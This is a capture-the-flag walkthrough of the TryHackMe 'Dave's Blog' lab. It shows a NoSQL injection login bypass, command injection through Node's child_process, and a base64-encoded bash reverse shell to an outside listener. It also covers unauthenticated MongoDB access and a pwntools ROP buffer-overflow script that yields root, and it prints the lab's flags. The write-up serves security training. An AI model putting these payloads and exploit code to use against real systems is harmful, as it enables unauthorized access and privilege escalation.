TryHackMe-Dave-s-Blog

From aldeid
Jump to navigation Jump to search

Dave’s Blog

My friend Dave made his own blog! You should go check it out.

Flag 1

Hint: What’s there to inject when there’s no SQL?

Services enumeration

Let’s start by enumerating the services running on the target:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f9:31:1f:9f:b4:a1:10:9d:a9:69:ec:d5:97:df:1a:34 (RSA)
|   256 e9:f5:b9:9e:39:33:00:d2:7f:cf:75:0f:7a:6d:1c:d3 (ECDSA)
|_  256 44:f2:51:7f:de:78:94:b2:75:2b:a8:fe:25:18:51:49 (ED25519)
80/tcp   open  http    nginx 1.14.0 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: Dave's Blog
3000/tcp open  http    Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: Dave's Blog

Web enumeration

Connecting on the web server shows a basic blog with only 1 post. No link is available, but the post tells us that it is using a NoSQL database.

There is a robots.txt file that discloses an /admin location:

[email protected]:/data/Dave_s_Blog$ curl -s http://10.10.139.182/robots.txt
User-Agent: *
Disallow: /admin

Admin

Connecting to /admin shows an authentication form. The source code of the page reveals that the credentials are passed as JSON.

<!DOCTYPE html>
<html>

<head>
  <title>Login | Dave's Blog</title>
  <link rel='stylesheet' href='/stylesheets/style.css' />
</head>

<body>
  <h1>Login</h1>

  <form method="POST">
    <input type="text" name="username" placeholder="username" /> <br />
    <input type="password" name="password" placeholder="password" /> <br />
    <input type="submit" value="Log in" />
  </form>

  Don't have an account? Click <a href="/admin/register">here</a> to register!

  <script>
    if(document.location.hash) {
      const div = document.createElement('div')
      div.innerText = decodeURIComponent(document.location.hash.substr(1));
      div.className = 'note';
      document.body.insertBefore(div, document.body.firstChild);
    }
    document.querySelector('form').onsubmit = (e) => {
      /*e.preventDefault();
      const username = document.querySelector('input[type=text]').value;
      const password = document.querySelector('input[type=password]').value;

      fetch('', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
        },
        body: JSON.stringify({username, password})
      }).then(() => {
        location.reload();
      })
      return false;*/
    }
  </script>
</body>

</html>

Checking on the Internet how to bypass JSON authentication led me to this post (https://book.hacktricks.xyz/pentesting-web/nosql-injection) where I was able to replicate the examples by injecting {"$ne": "foo"} in the username and password fields:

[email protected]:/data/Dave_s_Blog$ curl -D header.txt -H "Content-Type: application/json" -XPOST -d '{"username":{"$ne": "foo"},"password":{"$ne": "foo"}}' http://10.10.139.182/admin
Found. Redirecting to /admin
[email protected]:/data/Dave_s_Blog$ cat header.txt 
HTTP/1.1 302 Found
Server: nginx/1.14.0 (Ubuntu)
Date: Wed, 23 Sep 2020 07:05:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 28
Connection: keep-alive
X-Powered-By: Express
Set-Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlLCJfaWQiOiI1ZWM2ZTVjZjFkYzRkMzY0YmY4NjQxMDciLCJ1c2VybmFtZSI6ImRhdmUiLCJwYXNzd29yZCI6IlRITXtTdXBlclNlY3VyZUFkbWluUGFzc3dvcmQxMjN9IiwiX192IjowLCJpYXQiOjE2MDA4NDQ3MDR9.nioG_MjIcRGJ3PObm0QcDv_eIqRU6baBCYAi7aRWVPw; Path=/
Location: /admin
Vary: Accept

It provided me with a JWT token that we can decode (base64). The password field contains the first flag.

[email protected]:/data/Dave_s_Blog$ export IFS=".";jwt="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlLCJfaWQiOiI1ZWM2ZTVjZjFkYzRkMzY0YmY4NjQxMDciLCJ1c2VybmFtZSI6ImRhdmUiLCJwYXNzd29yZCI6IlRITXtTdXBlclNlY3VyZUFkbWluUGFzc3dvcmQxMjN9IiwiX192IjowLCJpYXQiOjE2MDA4NDQ3MDR9.nioG_MjIcRGJ3PObm0QcDv_eIqRU6baBCYAi7aRWVPw";for j in $jwt; do echo "$j" | base64 -d;done
{"alg":"HS256","typ":"JWT"}{"isAdmin":true,"_id":"5ec6e5cf1dc4d364bf864107","username":"dave","password":"THM{SuperSecureAdminPassword123}","__v":0,"iat":1600844704}�*base64: invalid input

Flag 1: THM{SuperSecureAdminPassword123}

Flag 2 / User flag

Now provided with credentials (dave:THM{SuperSecureAdminPassword123}), we can login and execute commands, as described in this post.

I was not able to execute commands using the below format:

{"exec":"require('child_process').exec('<command>');"}

But this format worked:

{"exec":"require('child_process').execSync('<command>').toString();"}

Let’s make a reverse shell. We’ll first encode it in base64:

$ echo -n "bash -i >& /dev/tcp/10.8.50.72/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUwLjcyLzQ0NDQgMD4mMQ==

Start a listener (rlwrap nc -nlvp 4444) and intercept the authentication request in Burp Suite and modify it as follows:

POST /admin/exec HTTP/1.1
Host: 10.10.139.182
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.139.182/admin
Content-Type: application/json
Origin: http://10.10.139.182
Content-Length: 140
Connection: close
Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc0FkbWluIjp0cnVlLCJfaWQiOiI1ZWM2ZTVjZjFkYzRkMzY0YmY4NjQxMDciLCJ1c2VybmFtZSI6ImRhdmUiLCJwYXNzd29yZCI6IlRITXtTdXBlclNlY3VyZUFkbWluUGFzc3dvcmQxMjN9IiwiX192IjowLCJpYXQiOjE2MDA4NDQ4MTd9.iYAlMdDV6SaG8TWaDiMyFfS2v69HYoRgFzfUhSMJ2bo

{"exec":"require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjUwLjcyLzQ0NDQgMD4mMQ== | base64 -d | bash').toString();"}

A reverse shell is now spawned to our listener window:

[email protected]:/data/vpn$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.139.182] 47686
bash: cannot set terminal process group (814): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:~/blog$ cd /home
cd /home
[email protected]:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root root 4096 May 21 20:27 .
drwxr-xr-x 24 root root 4096 May 21 20:28 ..
drwxr-xr-x  5 dave dave 4096 May 22 13:32 dave
[email protected]:/home$ cd dave
cd dave
[email protected]:~$ ls -la
ls -la
total 44
drwxr-xr-x  5 dave dave 4096 May 22 13:32 .
drwxr-xr-x  3 root root 4096 May 21 20:27 ..
lrwxrwxrwx  1 dave dave    9 May 21 20:29 .bash_history -> /dev/null
-rw-r--r--  1 dave dave  220 May 21 20:27 .bash_logout
-rw-r--r--  1 dave dave 3771 May 21 20:27 .bashrc
drwxr-xr-x  9 dave dave 4096 Sep 23 05:46 blog
drwxrwxr-x  3 dave dave 4096 May 21 20:38 .local
drwxrwxr-x 94 dave dave 4096 May 21 20:34 .npm
-rw-r--r--  1 dave dave  807 May 21 20:27 .profile
-rw-rw-r--  1 dave dave   66 May 21 20:38 .selected_editor
-rwxr-xr-x  1 root root  137 May 22 13:32 startup.sh
-rw-rw-r--  1 dave dave   38 May 21 20:45 user.txt
[email protected]:~$ cat user.txt
cat user.txt
THM{5fa1f779d1835367fdcfa4741bebb88a}

Flag 3

Hint: mongo deeper

MngoDB is running on port 27017 for localhost only:

[email protected]:~$ netstat -putan
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:53682         127.0.0.1:27017         ESTABLISHED 1050/node           
tcp        0      0 127.0.0.1:27017         127.0.0.1:53688         ESTABLISHED -                   
tcp        0      0 127.0.0.1:27017         127.0.0.1:53682         ESTABLISHED -                   
tcp        0      0 127.0.0.1:53980         127.0.0.1:27017         ESTABLISHED 1050/node           
tcp        0    612 10.10.139.182:22        10.8.50.72:37676        ESTABLISHED -                   
tcp        0      0 127.0.0.1:53688         127.0.0.1:27017         ESTABLISHED 1050/node           
tcp        0      0 127.0.0.1:27017         127.0.0.1:53980         ESTABLISHED -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::3000                 :::*                    LISTEN      1050/node           
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 10.10.139.182:68        0.0.0.0:*                           -         

Checking on the configuration file confirms hat no password is required to connect, and that there is a daves-blog database:

[email protected]:~/blog$ cat app.js 

[REDACTED]

mongoose.connect('mongodb://localhost:27017/daves-blog', {
  useNewUrlParser: true
});

[REDACTED]

Let’s connect to the Mongo database:

[email protected]:~/blog$ mongo
MongoDB shell version v3.6.3
connecting to: mongodb://127.0.0.1:27017
MongoDB server version: 3.6.3
Welcome to the MongoDB shell.
For interactive help, type "help".
For more comprehensive documentation, see
    http://docs.mongodb.org/
Questions? Try the support group
    http://groups.google.com/group/mongodb-user
Server has startup warnings: 
2020-09-23T05:44:11.028+0000 I STORAGE  [initandlisten] 
2020-09-23T05:44:11.028+0000 I STORAGE  [initandlisten] ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2020-09-23T05:44:11.028+0000 I STORAGE  [initandlisten] **          See http://dochub.mongodb.org/core/prodnotes-filesystem
2020-09-23T05:45:46.741+0000 I CONTROL  [initandlisten] 
2020-09-23T05:45:46.819+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.
2020-09-23T05:45:46.819+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.
2020-09-23T05:45:46.819+0000 I CONTROL  [initandlisten] 

Let’s select the daves-blog database and list the collections:

> use daves-blog
switched to db daves-blog
> db.collections
daves-blog.collections
> show collections
posts
users
whatcouldthisbes

One collection seems interesting, let’s check what in it:

> db.whatcouldthisbes.find().pretty()
{
    "_id" : ObjectId("5ec6e5cf1dc4d364bf864108"),
    "whatCouldThisBe" : "THM{993e107fc66844482bb5dd0e4c485d5b}",
    "__v" : 0
}

Flag 3: THM{993e107fc66844482bb5dd0e4c485d5b}

Flag 4

Checking dave’s privileges reveals that we can execute /uid-checker as root with sudo, without password:

[email protected]:~/blog$ sudo -l
Matching Defaults entries for dave on daves-blog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dave may run the following commands on daves-blog:
    (root) NOPASSWD: /uid_checker

Running the executable shows an interactive menu with 2 choices, to display our user or group ID. Checking the strings discloses another flag.

[email protected]:~$ strings /uid_checker 
/lib64/ld-linux-x86-64.so.2
libc.so.6
gets
puts
printf
getgid
system
getuid
strcmp
__libc_start_main
GLIBC_2.2.5
__gmon_start__
AWAVI
AUATL
[]A\A]A^A_
How did you get here???
/bin/sh
Welcome to the UID checker!
Enter 1 to check your UID or enter 2 to check your GID
Your UID is: %d
Your GID is: %d
THM{runn1ng_str1ngs_1s_b4sic4lly_RE}
Wow! You found the secret function! I still need to finish it..
Invalid choice

[REDACTED]

Flag 4: THM{runn1ng_str1ngs_1s_b4sic4lly_RE}

Flag 5 / Root flag

Hint: from pwn import *

Running strings revealed the presence of /bin/sh, which seems interesting, as the program is run with privileges. Let’s download it and do a bit of reverse engineering.

Below is the pseudo C code reversed in Hopper:

void secret() {
    puts("How did you get here???");
    system("/bin/sh");
    return;
}

int main(int arg0, int arg1) {
    puts("Welcome to the UID checker!\nEnter 1 to check your UID or enter 2 to check your GID");
    gets(&var_50);
    rax = strcmp(&var_50, 0x40089b);
    if (rax == 0x0) {
            rax = printf("Your UID is: %d\n", getuid());
    }
    else {
            rax = strcmp(&var_50, 0x4008ae);
            if (rax == 0x0) {
                    rax = printf("Your GID is: %d\n", getgid());
            }
            else {
                    rax = strcmp(&var_50, "THM{runn1ng_str1ngs_1s_b4sic4lly_RE}");
                    if (rax == 0x0) {
                            rax = puts("Wow! You found the secret function! I still need to finish it..");
                    }
                    else {
                            rax = puts("Invalid choice");
                    }
            }
    }
    return rax;
}

As we can see, calling the secret() function will spawn a root shell, but the function is not called anywhere from main(). If we want to be able to access it, we’ll need a buffer overflow. Let’s use ropstar to automatically get the information we need:

[email protected]:/data/src/ropstar$ python3 ropstar.py /data/Dave_s_Blog/files/uid_checker

[REDACTED]

[+] Offset: 88
[*] Checking for leakless exploitation
[*] Using local target
[+] Starting local process '/data/Dave_s_Blog/files/uid_checker' argv=[b'/data/Dave_s_Blog/files/uid_checker'] : pid 6076
[*] Exploit: gets(bss); system(bss)
[*] Loading gadgets for '/data/Dave_s_Blog/files/uid_checker'
[*] 0x0000:         0x400803 pop rdi; ret
    0x0008:         0x601060 [arg0] rdi = 6295648
    0x0010:         0x4005b0
    0x0018:         0x400803 pop rdi; ret
    0x0020:         0x601060 [arg0] rdi = 6295648
    0x0028:         0x400570

[REDACTED]

Now, let’s automate the exploitation with the below python script:

#!/usr/bin/env python3

from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64

offset = 88
payload = cyclic(offset)
payload += p64(0x400803) # pop rdi; ret
payload += p64(0x601060) # [arg0] rdi = 6295648
payload += p64(0x4005b0)
payload += p64(0x400803) # pop rdi; ret
payload += p64(0x601060) # [arg0] rdi = 6295648
payload += p64(0x400570)

s = ssh(host='10.10.139.182', user='dave')
p = s.process(['sudo', '/uid_checker'])
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive()

Running our script will automatically connect (SSH) to the target, run the program and inject the payload that will overflow it to spawn a shell.

[email protected]:/data/Dave_s_Blog/files$ ./rop.py 
[+] Connecting to 10.10.139.182 on port 22: Done
[*] [email protected]:
    Distro    Ubuntu 18.04
    OS:       linux
    Arch:     amd64
    Version:  4.15.0
    ASLR:     Enabled
[+] Starting remote process 'sudo' on 10.10.139.182: pid 4972
b'Welcome to the UID checker!\n'
b'Enter 1 to check your UID or enter 2 to check your GID\n'
[*] Switching to interactive mode
Invalid choice
# $ id
uid=0(root) gid=0(root) groups=0(root)
# $ cd /root
# $ ls -la
total 48
drwx------  6 root root 4096 May 22 13:32 .
drwxr-xr-x 24 root root 4096 May 21 20:28 ..
lrwxrwxrwx  1 root root    9 May 21 20:30 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwx------  2 root root 4096 May 21 20:26 .cache
-rw-------  1 root root  161 May 21 20:48 .dbshell
drwx------  3 root root 4096 May 21 20:26 .gnupg
drwxr-xr-x  3 root root 4096 May 21 20:26 .local
lrwxrwxrwx  1 root root    9 May 21 20:46 .mongorc.js -> /dev/null
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   38 May 21 20:57 root.txt
-rw-r--r--  1 root root   66 May 21 20:44 .selected_editor
-rw-r--r--  1 root root   87 May 22 13:31 setup.sh
drwx------  2 root root 4096 May 21 17:48 .ssh
# $ cat root.txt
THM{a0a9c4f6809c84e212ac889d39b9cb48}

Root flag: THM{a0a9c4f6809c84e212ac889d39b9cb48}

Comments

blog comments powered by Disqus

Keywords: jwt nodejs json mongodb collections buffer overflow rop ropstar pwn